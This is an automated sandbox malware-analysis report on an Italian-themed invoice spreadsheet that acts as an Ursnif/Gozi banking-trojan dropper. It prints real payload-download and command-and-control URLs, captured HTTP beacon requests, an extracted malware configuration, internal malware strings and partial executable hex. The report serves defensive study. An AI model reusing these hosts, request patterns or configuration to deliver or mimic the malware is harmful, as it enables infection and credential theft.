
Analysis Report fattura_28.xls

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 225098
Start date: 24.04.2020
Start time: 11:14:40
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 20s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: fattura_28.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.bank.troj.spyw.expl.evad.winXLS@19/56@10/4
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 2.4% (good quality ratio 2.3%)
  • Quality average: 88.6%
  • Quality standard deviation: 19.4%
HCA Information:
  • Successful, ratio: 75%
  • Number of executed functions: 99
  • Number of non-executed functions: 236
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Excluded processes from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 23.223.11.158, 204.79.197.200, 13.107.21.200, 104.72.180.62, 13.107.13.80, 2.20.143.30, 2.20.143.21, 205.185.216.10, 205.185.216.42, 8.248.117.254, 8.253.207.121, 8.238.29.254, 67.26.81.254, 67.26.137.254
  • Excluded domains from analysis (whitelisted): www.bing.com, e-0001.dc-msedge.net, dual-a-0001.a-msedge.net, api.bing.com, afd.e-0001.dc-msedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, ncc.avast.com.edgesuite.net, e11290.dspg.akamaiedge.net, go.microsoft.com, any.edge.bing.com, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, auto.au.download.windowsupdate.com.c.footprint.net, ieonline.microsoft.com, a1488.dscd.akamai.net, api-bing-com.e-0001.e-msedge.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | | false | Hidden Macro 4.0, Gozi, Ursnif | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false | 


Classification Spiderchart

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



MITRE ATT&CK Matrix

Numbers in parentheses are the per-technique counts shown in the report.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts (1) | Windows Management Instrumentation (2) | Valid Accounts (1) | Valid Accounts (1) | Software Packing (21) | Credential Dumping (1) | System Time Discovery (1) | Remote File Copy (12) | Man in the Browser (1) | Data Encrypted (1) | Remote File Copy (12) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media | Scripting (2) | Port Monitors | Access Token Manipulation (1) | Scripting (2) | Network Sniffing | Account Discovery (1) | Remote Services | Data from Local System (1) | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Execution through API (3) | Accessibility Features | Process Injection (63) | Obfuscated Files or Information (1) | Input Capture | File and Directory Discovery (5) | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Exploitation for Client Execution (3) | System Firmware | DLL Search Order Hijacking | Masquerading (1) | Credentials in Files | System Information Discovery (35) | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol (12) | SIM Card Swap | Premium SMS Toll Fraud | 
Exploit Public-Facing Application | Graphical User Interface (1) | Shortcut Modification | File System Permissions Weakness | Valid Accounts (1) | Account Manipulation | Virtualization/Sandbox Evasion (1) | Shared Webroot | Data Staged | Scheduled Transfer | Connection Proxy (1) | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | 
Spearphishing Link | Command-Line Interface (2) | Modify Existing Service | New Service | Virtualization/Sandbox Evasion (1) | Brute Force | Process Discovery (3) | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | Abuse Accessibility Features | 
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Access Token Manipulation (1) | Two-Factor Authentication Interception | Application Window Discovery (1) | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | 
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Process Injection (63) | Bash History | System Owner/User Discovery (1) | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | 
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Connection Proxy (1) | Input Prompt | System Network Connections Discovery | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | Data Destruction | 

Signature Overview



AV Detection:

Found malware configuration
Source: sodxnes.exe.2164.2.memstr | Malware Configuration Extractor: Ursnif {"server": "12", "version": "214131", "uptime": "352JJn", "crc": "3", "id": "8585", "user": "be6bfbbc04b2ebbcc45396fdb578e911", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: securezza.at | Virustotal: Detection: 7%
Source: line.monalisapizzeriasi.com | Virustotal: Detection: 10%
Source: http://gstat.hamiltoncustomhomesinc.com/fattura.exe | Virustotal: Detection: 8%
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.sodxnes.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_00225632 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00225632
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_05606656 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_05606656
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_055F284E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_055F284E
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0560DB2F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_0560DB2F
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_0560B299 wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0560B299
Contains functionality to query local drives
Source: C:\ProgramData\sodxnes.exe | Code function: 2_2_05604342 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_05604342
Enumerates the file system
Source: C:\Windows\System32\ie4uinit.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\ie4uinit.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\ie4uinit.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\ie4uinit.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\ie4uinit.exe | File opened: C:\Users\user
Source: C:\Windows\System32\ie4uinit.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0ACGMOUV\fattura[1].exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\ProgramData\sodxnes.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\ProgramData\sodxnes.exe

Networking:

Creates a COM Internet Explorer object
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgID
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgID
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\ProgramData\sodxnes.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: sodxnes.exe, 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: sodxnes.exe, 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmp | String found in binary or memory: vADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Downloads executable code via HTTP
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Fri, 24 Apr 2020 09:16:15 GMT
    Server: Apache/2.4.18 (Ubuntu)
    Last-Modified: Fri, 24 Apr 2020 09:15:01 GMT
    ETag: "43000-5a405cccef818"
    Accept-Ranges: bytes
    Content-Length: 274432
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdos-program
    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 50 a0 da 5b 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 78 01 00 00 ec 2c 04 00 00 00 00 f8 90 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 2d 04 00 04 00 00 e3 f4 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 d3 01 00 50 00 00 00 00 90 2c 04 f0 57 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 76 01 00 00 10 00 00 00 78 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 76 4e 00 00 00 90 01 00 00 50 00 00 00 7c 01 00 00 
    00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b4 ad 2a 04 00 e0 01 00 00 0c 01 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 57 01 00 00 90 2c 04 00 58 01 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0ACGMOUV\fattura[1].exe
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected:
    GET /fattura.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: gstat.hamiltoncustomhomesinc.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /images/vt6G1XeymRxjyw99/uJu1Co0NCp8XDAF/A4EL32Pwn0gFTMv5l3/bFOIqzhKU/lZjwIJqkCLPIkMVk_2Bd/rDMu77T3mJGgIPn846n/xttes00EkSCsEPpEtL_2Fu/jmcYtdayneeAi/cIIG5lPJ/gomP_2FHyVudt9P/9.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: securezza.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
    Host: securezza.at
    Connection: Keep-Alive
    Cookie: PHPSESSID=g1mogeufhv4lq8j34boptnth54; lang=en
Source: global traffic | HTTP traffic detected:
    GET /images/n58fjtZhTCpMhOny/d_2F5nDeAbVbALK/_2FYd0KZgbPGjaCEmW/loCUkF_2F/0E54l0KaY43mbq2uSJ0J/Rwp8BS_2F_2ByLORkmc/KIDbs84xzxZKkuB8EvUNbN/ggFapaqXAKiQv/CZP_2F6q/BCNWGvtwCKrFjyF/QCcwrts.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: securezza.at
    Connection: Keep-Alive
    Cookie: lang=en
Found strings which match to known social media urls
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: gstat.hamiltoncustomhomesinc.com
Urls found in memory or binary data
Source: explorer.exe, 00000014.00000000.1289585565.06460000.00000008.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.1289585565.06460000.00000008.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: sodxnes.exe | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: sodxnes.exe, 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://home.altervista.org/favicon.ico
Source: sodxnes.exe, 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp, sodxnes.exe, 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmp | String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
